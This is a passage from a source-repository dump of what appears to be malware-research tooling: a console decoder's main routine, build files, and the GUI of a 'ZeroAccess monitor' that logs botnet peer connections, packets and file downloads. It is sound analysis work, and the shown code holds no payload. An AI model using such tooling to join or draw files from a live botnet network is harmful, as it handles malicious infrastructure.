     dwTemp;\n    HANDLE       StdIn;\n    INPUT_RECORD inp1;\n\n    __security_init_cookie();\n\n    do {\n\n        g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE);\n        if (g_ConOut == INVALID_HANDLE_VALUE) {\n            uResult = (UINT)-1;\n            break;\n        }\n\n        g_ConsoleOutput = TRUE;\n        if (!GetConsoleMode(g_ConOut, &dwTemp)) {\n            g_ConsoleOutput = FALSE;\n        }\n\n        SetConsoleTitle(T_SFDECODETITLE);\n        SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT);\n        if (g_ConsoleOutput == FALSE) {\n            WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dwTemp, NULL);\n        }\n\n        uResult = SfProcessCmdLine(GetCommandLine());\n\n        if (g_ConsoleOutput) {\n\n            SfcuiPrintText(g_ConOut,\n                T_SFPRESSANYKEY,\n                TRUE, FALSE);\n\n            StdIn = GetStdHandle(STD_INPUT_HANDLE);\n            if (StdIn != INVALID_HANDLE_VALUE) {\n                RtlSecureZeroMemory(&inp1, sizeof(inp1));\n                ReadConsoleInput(StdIn, &inp1, 1, &dwTemp);\n                ReadConsole(StdIn, &g_BE, 1, &dwTemp, NULL);\n            }\n        }\n\n    } while (cond);\n\n    ExitProcess(uResult);\n}\n"
  },
  {
    "path": "Source/Umikaze/resource.h",
    "content": "//{{NO_DEPENDENCIES}}\n// Microsoft Visual C++ generated include file.\n// Used by resource.rc\n\n// Next default values for new objects\n// \n#ifdef APSTUDIO_INVOKED\n#ifndef APSTUDIO_READONLY_SYMBOLS\n#define _APS_NEXT_RESOURCE_VALUE        101\n#define _APS_NEXT_COMMAND_VALUE         40001\n#define _APS_NEXT_CONTROL_VALUE         1001\n#define _APS_NEXT_SYMED_VALUE           101\n#endif\n#endif\n"
  },
  {
    "path": "Source/Yuudachi/Yuudachi.vcxproj",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"14.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <ProjectGuid>{14358883-8E74-44F5-BCC4-C32D41A3A662}</ProjectGuid>\n    <Keyword>Win32Proj</Keyword>\n    <RootNamespace>Yuudachi</RootNamespace>\n    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v140</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v140</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" 
Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v140</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v140</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"Shared\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" 
Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>zamon32</TargetName>\n    <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>zamon64</TargetName>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <WarningLevel>Level4</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <CompileAs>CompileAsC</CompileAs>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      
<EntryPointSymbol>SfMain</EntryPointSymbol>\n    </Link>\n    <Manifest>\n      <AdditionalManifestFiles>za.manifest</AdditionalManifestFiles>\n    </Manifest>\n    <Manifest>\n      <EnableDpiAwareness>true</EnableDpiAwareness>\n    </Manifest>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <WarningLevel>Level4</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <CompileAs>CompileAsC</CompileAs>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EntryPointSymbol>SfMain</EntryPointSymbol>\n    </Link>\n    <Manifest>\n      <AdditionalManifestFiles>za.manifest</AdditionalManifestFiles>\n    </Manifest>\n    <Manifest>\n      <EnableDpiAwareness>true</EnableDpiAwareness>\n    </Manifest>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <CompileAs>CompileAsC</CompileAs>\n      <ControlFlowGuard>Guard</ControlFlowGuard>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n      <MultiProcessorCompilation>true</MultiProcessorCompilation>\n      <StringPooling>true</StringPooling>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      
<OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>No</GenerateDebugInformation>\n      <EntryPointSymbol>SfMain</EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n    </Link>\n    <Manifest>\n      <AdditionalManifestFiles>za.manifest</AdditionalManifestFiles>\n    </Manifest>\n    <Manifest>\n      <EnableDpiAwareness>true</EnableDpiAwareness>\n    </Manifest>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <CompileAs>CompileAsC</CompileAs>\n      <ControlFlowGuard>Guard</ControlFlowGuard>\n      <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>\n      <MultiProcessorCompilation>true</MultiProcessorCompilation>\n      <StringPooling>true</StringPooling>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>No</GenerateDebugInformation>\n      <EntryPointSymbol>SfMain</EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n      <IgnoreAllDefaultLibraries>\n      </IgnoreAllDefaultLibraries>\n    </Link>\n    <Manifest>\n      <AdditionalManifestFiles>za.manifest</AdditionalManifestFiles>\n    </Manifest>\n    <Manifest>\n      <EnableDpiAwareness>true</EnableDpiAwareness>\n    </Manifest>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <ClCompile Include=\"..\\minirtl\\cmdline.c\" />\n    <ClCompile Include=\"..\\minirtl\\hextou64.c\" />\n    <ClCompile Include=\"..\\minirtl\\hextoul.c\" />\n    <ClCompile 
Include=\"..\\minirtl\\i64tostr.c\" />\n    <ClCompile Include=\"..\\minirtl\\itostr.c\" />\n    <ClCompile Include=\"..\\minirtl\\strtoi.c\" />\n    <ClCompile Include=\"..\\minirtl\\strtoi64.c\" />\n    <ClCompile Include=\"..\\minirtl\\strtou64.c\" />\n    <ClCompile Include=\"..\\minirtl\\strtoul.c\" />\n    <ClCompile Include=\"..\\minirtl\\u64tohex.c\" />\n    <ClCompile Include=\"..\\minirtl\\u64tostr.c\" />\n    <ClCompile Include=\"..\\minirtl\\ultohex.c\" />\n    <ClCompile Include=\"..\\minirtl\\ultostr.c\" />\n    <ClCompile Include=\"..\\minirtl\\_filename.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strcat.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strcmp.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strcmpi.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strcpy.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strend.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strlen.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strncmp.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strncmpi.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strncpy.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strstr.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strstri.c\" />\n    <ClCompile Include=\"..\\shared\\ea.c\" />\n    <ClCompile Include=\"..\\shared\\ldr.c\" />\n    <ClCompile Include=\"..\\shared\\md5.c\" />\n    <ClCompile Include=\"..\\shared\\rc4.c\" />\n    <ClCompile Include=\"..\\shared\\util.c\" />\n    <ClCompile Include=\"..\\shared\\za_crypto.c\" />\n    <ClCompile Include=\"gui.c\" />\n    <ClCompile Include=\"main.c\" />\n    <ClCompile Include=\"p2p.c\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"..\\minirtl\\cmdline.h\" />\n    <ClInclude Include=\"..\\minirtl\\minirtl.h\" />\n    <ClInclude Include=\"..\\minirtl\\rtltypes.h\" />\n    <ClInclude Include=\"..\\minirtl\\_filename.h\" />\n    <ClInclude Include=\"..\\shared\\ea.h\" />\n    <ClInclude Include=\"..\\shared\\global.h\" />\n    <ClInclude Include=\"..\\shared\\ldr.h\" />\n    
<ClInclude Include=\"..\\shared\\md5.h\" />\n    <ClInclude Include=\"..\\shared\\ntos.h\" />\n    <ClInclude Include=\"..\\shared\\rc4.h\" />\n    <ClInclude Include=\"..\\shared\\util.h\" />\n    <ClInclude Include=\"..\\shared\\za.h\" />\n    <ClInclude Include=\"..\\shared\\za_crypto.h\" />\n    <ClInclude Include=\"..\\shared\\za_rkey.h\" />\n    <ClInclude Include=\"gui.h\" />\n    <ClInclude Include=\"p2p.h\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ResourceCompile Include=\"resource.rc\" />\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "Source/Yuudachi/Yuudachi.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <Filter Include=\"Source Files\">\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\n    </Filter>\n    <Filter Include=\"Header Files\">\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\n      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>\n    </Filter>\n    <Filter Include=\"Resource Files\">\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\n    </Filter>\n    <Filter Include=\"minirtl\">\n      <UniqueIdentifier>{b28fb8f1-e665-449f-80f8-3eae4258df44}</UniqueIdentifier>\n    </Filter>\n    <Filter Include=\"shared\">\n      <UniqueIdentifier>{43bb3fdd-e398-4c7f-b3df-b6c20917a390}</UniqueIdentifier>\n    </Filter>\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"gui.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"main.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"p2p.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strcat.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strcmp.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strcmpi.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strcpy.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strend.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strlen.c\">\n      <Filter>minirtl</Filter>\n    
</ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strncmp.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strncmpi.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strncpy.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strstr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strstri.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\cmdline.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\hextou64.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\hextoul.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\i64tostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\itostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\strtoi.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\strtoi64.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\strtou64.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\strtoul.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\u64tohex.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\u64tostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\ultohex.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\ultostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\ea.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile 
Include=\"..\\shared\\md5.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\rc4.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\util.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\ldr.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\za_crypto.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_filename.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"gui.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"p2p.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\minirtl\\cmdline.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\minirtl\\minirtl.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\minirtl\\rtltypes.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\ea.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\global.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\md5.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\ntos.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\rc4.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\util.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\za.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\za_rkey.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\ldr.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude 
Include=\"..\\shared\\za_crypto.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\minirtl\\_filename.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n  </ItemGroup>\n  <ItemGroup>\n    <ResourceCompile Include=\"resource.rc\">\n      <Filter>Resource Files</Filter>\n    </ResourceCompile>\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "Source/Yuudachi/Yuudachi.vcxproj.user",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"14.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <PropertyGroup />\n</Project>"
  },
  {
    "path": "Source/Yuudachi/gui.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016\n*\n*  TITLE:       GUI.C\n*\n*  VERSION:     1.01\n*\n*  DATE:        22 Jan 2016\n*\n*  Yuudachi GUI support routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#define OEMRESOURCE\n#include \"..\\shared\\global.h\"\n#include \"p2p.h\"\n#include \"gui.h\"\n\n#include <commctrl.h>\n#pragma comment(lib, \"ComCtl32.Lib\")\n\nstatic const WCHAR\tT_SFWNDTITLE[] = TEXT(\"ZeroAccess monitor\");\nstatic const WCHAR\tT_SFMAINWNDCLASS[] = TEXT(\"za root class\");\n\nZA_GUI_CONTEXT g_guictx;\n\n/*\n* SfUIAddEvent\n*\n* Purpose:\n*\n* Output event.\n*\n*/\nVOID SfUIAddEvent(\n\t_In_opt_ PVOID ScanContext,\n\t_In_ ULONG Event,\n\t_In_opt_ LPWSTR lpValue\n\t)\n{\n\tLVITEM     lvitem;\n\tINT        index;\n\tULONG      n;\n\tLPWSTR     lpEvent;\n\tWCHAR      szBuffer[MAX_PATH];\n\tZA_SCANCTX *pCtx = (ZA_SCANCTX*)ScanContext;\n\n\tswitch (Event) {\n\n\tcase GUI_EVENT_ERROR:\n\t\tlpEvent = TEXT(\"Error\");\n\t\tbreak;\n\tcase GUI_EVENT_CONNECTION:\n\t\tlpEvent = TEXT(\"Connection\");\n\t\tbreak;\n\tcase GUI_EVENT_PACKET_RECV:\n\t\tlpEvent = TEXT(\"PacketReceived\");\n\t\tbreak;\n\tcase GUI_EVENT_PACKET_SEND:\n\t\tlpEvent = TEXT(\"PacketSend\");\n\t\tbreak;\n\tcase GUI_EVENT_DOWNLOAD_FILE:\n\t\tlpEvent = TEXT(\"FileDownload\");\n\t\tbreak;\n\tcase GUI_EVENT_FILE_HEADER:\n\t\tlpEvent = TEXT(\"FileHeader\");\n\t\tbreak;\n\tcase GUI_EVENT_PEER_HEADER:\n\t\tlpEvent = TEXT(\"PeerHeader\");\n\t\tbreak;\n\tcase GUI_EVENT_NEWROUND:\n\t\tlpEvent = TEXT(\"NewRound\");\n\t\tbreak;\n\tcase GUI_EVENT_PACKET_HEADER:\n\t\tlpEvent = TEXT(\"PacketHeader\");\n\t\tbreak;\n\tcase 
GUI_EVENT_INFORMATION:\n\t\tlpEvent = TEXT(\"Information\");\n\t\tbreak;\n\tcase GUI_EVENT_THREAD_STARTED:\n\tcase GUI_EVENT_THREAD_TERMINATED:\n\t\tlpEvent = TEXT(\"Thread\");\n\t\tbreak;\n\tdefault:\n\t\tlpEvent = TEXT(\"UnnamedEvent\");\n\t\tbreak;\n\t}\n\n\t//Event\n\tRtlSecureZeroMemory(&lvitem, sizeof(lvitem));\n\tlvitem.mask = LVIF_TEXT;\n\tlvitem.iSubItem = 0;\n\tlvitem.iItem = MAXINT;\n\tlvitem.iImage = 0;\n\tlvitem.pszText = lpEvent;\n\tindex = ListView_InsertItem(g_guictx.OutputWindow, &lvitem);\n\n\t//Value\n\tlvitem.mask = LVIF_TEXT;\n\tlvitem.iSubItem = 1;\n\tlvitem.pszText = lpValue;\n\tlvitem.iItem = index;\n\tListView_SetItem(g_guictx.OutputWindow, &lvitem);\n\n\tRtlSecureZeroMemory(szBuffer, sizeof(szBuffer));\n\t_strcpy(szBuffer, TEXT(\"TotalEvents: \"));\n\tultostr(ListView_GetItemCount(g_guictx.OutputWindow), _strend(szBuffer));\n\tSendMessage(g_guictx.StatusBar, SB_SETTEXT, (WPARAM)0, (LPARAM)&szBuffer);\n\n\tif (pCtx) {\n\t\t_strcpy(szBuffer, TEXT(\"Peers: \"));\t\n\t\tn = RtlNumberGenericTableElementsAvl(&pCtx->PeersTable);\n\t\tultostr(n, _strend(szBuffer));\n\t\tSendMessage(g_guictx.StatusBar, SB_SETTEXT, (WPARAM)1, (LPARAM)&szBuffer);\n\n\t\t_strcpy(szBuffer, TEXT(\"Peers in dump: \"));\n\t\tn = RtlNumberGenericTableElementsAvl(&pCtx->PeersTableDump);\n\t\tultostr(n, _strend(szBuffer));\n\t\tSendMessage(g_guictx.StatusBar, SB_SETTEXT, (WPARAM)2, (LPARAM)&szBuffer);\n\n\t\t_strcpy(szBuffer, TEXT(\"Files: \"));\n\t\tultostr(pCtx->NumberOfFiles, _strend(szBuffer));\n\t\tSendMessage(g_guictx.StatusBar, SB_SETTEXT, (WPARAM)3, (LPARAM)&szBuffer);\n\t}\n\tListView_RedrawItems(g_guictx.OutputWindow, ListView_GetItemCount(g_guictx.OutputWindow), -1);\n\tUpdateWindow(g_guictx.OutputWindow);\n}\n\n/*\n* SfUIMainWindowResize\n*\n* Purpose:\n*\n* Main window WM_SIZE handler.\n*\n*/\nVOID SfUIMainWindowResize(\n\tVOID\n\t)\n{\n\tRECT r1, StatusBarRect;\n\tLONG sizeY;\n\n\tSendMessage(g_guictx.StatusBar, WM_SIZE, 0, 
0);\n\n\tRtlSecureZeroMemory(&StatusBarRect, sizeof(StatusBarRect));\n\tGetWindowRect(g_guictx.StatusBar, &StatusBarRect);\n\n\tif (g_guictx.OutputWindow) {\n\n\t\tRtlSecureZeroMemory(&r1, sizeof(r1));\n\t\tGetClientRect(g_guictx.MainWindow, &r1);\n\n\t\tsizeY = StatusBarRect.bottom - StatusBarRect.top;\n\n\t\tSetWindowPos(g_guictx.OutputWindow, NULL, 0, 0,\n\t\t\tr1.right,\n\t\t\tr1.bottom - sizeY,\n\t\t\tSWP_NOMOVE | SWP_NOZORDER);\n\t}\n}\n\n/*\n* SfUIMainWindowProc\n*\n* Purpose:\n*\n* Main window message handler.\n*\n*/\nLRESULT CALLBACK SfUIMainWindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)\n{\n\tswitch (uMsg) {\n\n\tcase WM_GETMINMAXINFO:\n\t\tif (lParam) {\n\t\t\t((PMINMAXINFO)lParam)->ptMinTrackSize.x = 400;\n\t\t\t((PMINMAXINFO)lParam)->ptMinTrackSize.y = 256;\n\t\t}\n\t\tbreak;\n\n\tcase WM_SIZE:\n\t\tif (!IsIconic(hwnd)) {\n\t\t\tSfUIMainWindowResize();\n\t\t}\n\t\tbreak;\n\n\tcase WM_CLOSE:\n\t\tInterlockedExchange((PLONG)&g_guictx.bShutdown, 